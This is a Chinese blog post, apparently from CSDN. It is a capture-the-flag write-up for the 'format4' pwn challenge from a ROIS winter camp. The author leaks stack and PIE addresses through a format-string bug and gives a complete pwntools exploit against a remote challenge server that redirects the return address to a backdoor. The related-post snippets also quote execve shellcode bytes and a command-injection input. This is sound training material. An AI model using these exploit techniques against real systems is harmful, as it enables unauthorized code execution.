ROIS冬令营——format4

最新推荐文章于 2024-06-28 14:05:31 发布
最新推荐文章于 2024-06-28 14:05:31 发布
阅读量93 收藏
点赞数
分类专栏: pwn 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fzucaicai/article/details/129172450
版权

题目自取

链接:https://pan.baidu.com/s/1ASEBlVsI-UBRsjs7H3xPHw?pwd=4p8y 
提取码:4p8y

开始:

有NX保护,写不了shellcode
Full relro,说明改不了got表
有pie保护,说明可能需要泄露程序的基地址

 

 

 

IDA这里显示有后门函数,没有栈溢出,但是有格式化字符串漏洞。

看一下栈的情况:

大致思路是修改返回地址为后门函数,也就是 把rbp的下一个地址(main+46)处修改为backdoor的地址。
我们可以观察到0x7fffffffdec8这块地址指向的是返回地址的下一地址,我们可以泄露这个地址再减去0x8,就可以得到返回地址处的地址,在这里也就是0x7fffffffdda8。且距离第一个字符写入的地址dd70处只有0x10的距离,完全可以将dda0这个参数写入dd80处的内存。再配合格式化字符串漏洞,可以把返回地址处的内容(main+46)修改为backdoor的地址。

泄露栈的地址可以通过泄露0x7fffffffddc8处的main地址,再根据base=main-0xA0B(IDA显示程序main地址)即可得到程序的基地址

from pwn import *
elf = ELF('./format4')
io=remote("81.68.85.214",8012)
from LibcSearcher import *
context(os="linux", arch="amd64",log_level="debug")
io.recvuntil(b'ing.....')
io.recvline()
payload=b'%15$p'
io.send(payload)
main_addr=int(io.recv(14),16)-46
base=main_addr-0xA0B
backdoor_addr=0x951+base
print(hex(backdoor_addr))
t=backdoor_addr&0xffff
io.sendlineafter("anything else to say?\n",b"y")
io.recv()

payload=b'%14$p'
io.send(payload)
io.recvline()
stack_addr=int(io.recv(14),16)-0x8
print("修改数据开始")

io.sendlineafter("anything else to say?\n",b"y")

payload=b'%'+str(t).encode('utf-8')+b'c'+b'%10$hn'
payload=payload.ljust(0x10,b'a')+p64(stack_addr)


io.sendlineafter("leave something.....\n",payload)

io.sendlineafter("anything else to say?\n",b"n")
io.interactive()

这里要说明的是返回地址的时候返回的是base+0x951,是0x951而不是0x950,应该是栈对齐的原因,如果用ROPgadget拿到ret的地址,在返回后门函数前加一个ret应该也能够解决问题。但是很奇怪打远程的时候用ret不行,但是过一段时间回来再打又可以了。很奇怪

cccsl_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Python,OpenCV制作图像Mask——截取ROIs及构建透明的叠加层
qq_40985985的博客
07-04 3196
这篇博客将介绍如何使用OpenCV制作Mask图像掩码。使用位运算和图像掩码让我们只关注图像中感兴趣的部分。截取出任意区域的ROIs
ROIS冬令营———canary
fzucaicai的博客
02-19 88
于是结合前面的vuln栈溢出漏洞,我们可以覆盖返回地址为win函数的地址,从而完成跳转到win函数,因为v3是在栈上,且读入了flag,那么我们的思路就是通过格式化字符串漏洞去泄露出flag。如果只是单纯根据IDA给的栈位置v3位置位于esp+0x1b的话,其实是错的,可以很明显看到esp实际上一直在变动,所以通过综合判断,应该开始于第是十个参数,那接下来就是泄露啦,过程有点繁琐,就是不停地给v2读入%k$p获得对应的字符串。不过很不走运,在IDA里,并没有找到/bin/sh字符串,这希望也破灭了。
ROIS冬令营——database_in
fzucaicai的博客
02-21 99
shellcode:"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"(菜得要死,直接网上找,不要学我)拿到canary和rbp后,就可以通过栈溢出执行shellcode啦,但是我们注意到,由于shellcode太长,栈溢出太短,因此我们可以把shellcode放在栈中,在溢出的返回地址处写入返回到shellcode的地方。个人习惯先checksec再IDA。
ROIS冬令营——database
fzucaicai的博客
02-20 72
函数的意思是从标准输入中读入最多32个字节的数据,从标准输入读取一个字节,如果小于等于 0 则说明读取失败,返回 -1(0xFFFFFFFF).如果读取到换行符 ,将换行符替换为字符串0,则返回-1,就会停止。' 意思就是分两次执行,如输入 echo hello world && cat flag,它的意思就是执行system('echo hello world') system('cat flag')变量中的字符串作为参数,将它们合并成一个新的字符串,最后将结果存储到。
ROIS冬令营——format3(把bss段数据移至栈上)
fzucaicai的博客
02-19 66
漏洞是非常明显的,有格式化字符串漏洞,就是要改key的值为2023,但是发现key的值不在栈上,因此我们不能直接用输入%n来修改栈上的数据,而是要把key这个数据的地址放到栈中,然后进行修改。可以看到key变量在bss区,地址是0x60208c。那么我们的思路就是把bss段key的地址移至栈上,然后修改key的值。链接:https://pan.baidu.com/s/10SyKe0s9cyY6kiblH2fs8Q?先往第八个参数写入数据2023(因为我们将把key的地址放在第8个参数,rsp是第6个参数)
2021 rois暑假集训——栈溢出与简单的rop链(buuctf练习)
weixin_56780239的博客
08-07 1172
2021年暑假参加集训,在buuctf上做的几道题的writeup.
cuda——nms
xiaohu的博客
08-07 760
cuda——nms
Ubuntu安装OpenCV4记录
zhangrelay的专栏
11-20 3145
参考:https://blog.csdn.net/new_delete_/article/details/84797041 在Ubuntu 18.04安装OpenCV 4.1.2版本: 安装依赖: sudo apt-get install build-essential libgtk2.0-dev libgtk-3-dev libavcodec-dev libavformat-dev l...
YOLOv4中的tricks概念总结——Bag of freebies
Clichong
06-17 1383
以下内容是对YOLOv4总结出的Bag of freebies进行一个汇总记录: 通常,传统的目标检测器是离线训练的。因此,研究人员总是喜欢利用这一优势,开发更好的训练方法,使目标检测器在不增加推理代价的情况下获得更好的准确率。我们把这些只会改变培训策略或只会增加培训成本的方法称为“Bag of freebies”。 以下我对这些方法进行一个简要的汇总与介绍: 1.pixel-wise调整 满足Bag of freebies定义的目标检测方法经常采用的是数据扩增。数据增强的目的是增加输入图像的可变性,使所设
软路由rois
07-27
安装于破解方法:2个ISO分别刻盘(虚拟机无视该步骤), 先安装官方原版mikrotik-5.24.iso, 再用破解光盘启动HunterTik-v2.3.1.iso, 一路回车,搞定。。。... (如果以前是安装过HunterTik-v2.3.1.iso破解的(5.22-...
Measure_ROIs:ImageJ宏
05-08
设置了“测量投资回报率”宏 •这组宏用于定义图像上的关注区域并测量其特征(区域,强度...)。 工作流程分为两部分。 它允许您通过三种不同的方法为给定通道上的所有图像生成感兴趣的特征的归类ROI。...
Predicting cortical ROIs via joint modeling of anatomical and connectional profiles
02-21
Predicting cortical ROIs via joint modeling of anatomical and connectional profiles
roisin-spring:用于分析临床数据的 Roisin Web 应用程序
06-05
服务器部署完成 roisin-settings.properties 文件将上述文件复制到 CATALINA_HOME
ENVI遥感图像处理实验二——图像常规处理2.pdf
04-04
4. 在“Select Spatial Subset”对话框中,通过“Subset By Image”定义裁剪区域,可以输入行列数或直接拖动红色矩形框。 5. 完成裁剪区域设置后,确认输出路径和文件名,保存裁剪结果。 - **不规则分幅裁剪**:...
將IP地址改成自動獲取的詳細步驟
最新发布
ecommerce_Amazon的博客
06-28 384
將IP地址改成自動獲取的詳細步驟。
国际网络专线怎么开通?
lxzn123的博客
06-25 351
一个优秀的服务商,应具备广泛的全球网络覆盖能力,能根据企业的具体需求,提供定制化的网络解决方案。在全球化日益加速的今天,企业越来越需要稳定、高效的网络来支撑他们的跨国业务。同时,选择一个负责任的服务商,将确保网络专线的长期稳定运行,为企业的国际化发展提供强有力的网络支撑。这一阶段,服务商会确定最佳的网络路径,配置合适的网络设备,确保数据在跨国传输过程中的稳定性和安全性。一个优秀的服务商,不仅技术团队专业实力强,还要能够提供7*24小时的快速响应,让企业在享受高质量网络服务的同时,也能获得全方位的售后支持。
Qt | QSS自定义部件的外观
m0_45463480的博客
06-24 214
Qt | QSS自定义部件的外观
串口小工具(来源网络,源码修改)
HongDaYu的搬砖之路
06-25 252
从CSDN 中的一位博主的分享做了一些修改。QtSerial 的配和更稳定些。
ROIS[r][4]
05-31
ROIS[r]通常用于目标检测算法中的区域兴趣(ROI)池化操作。...ROIS[r]用于存储所有区域兴趣的坐标信息,其中r表示区域兴趣的数量,每个区域兴趣由4个坐标值来确定其位置,分别为左上角的x,y坐标和右下角的x,y坐标。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值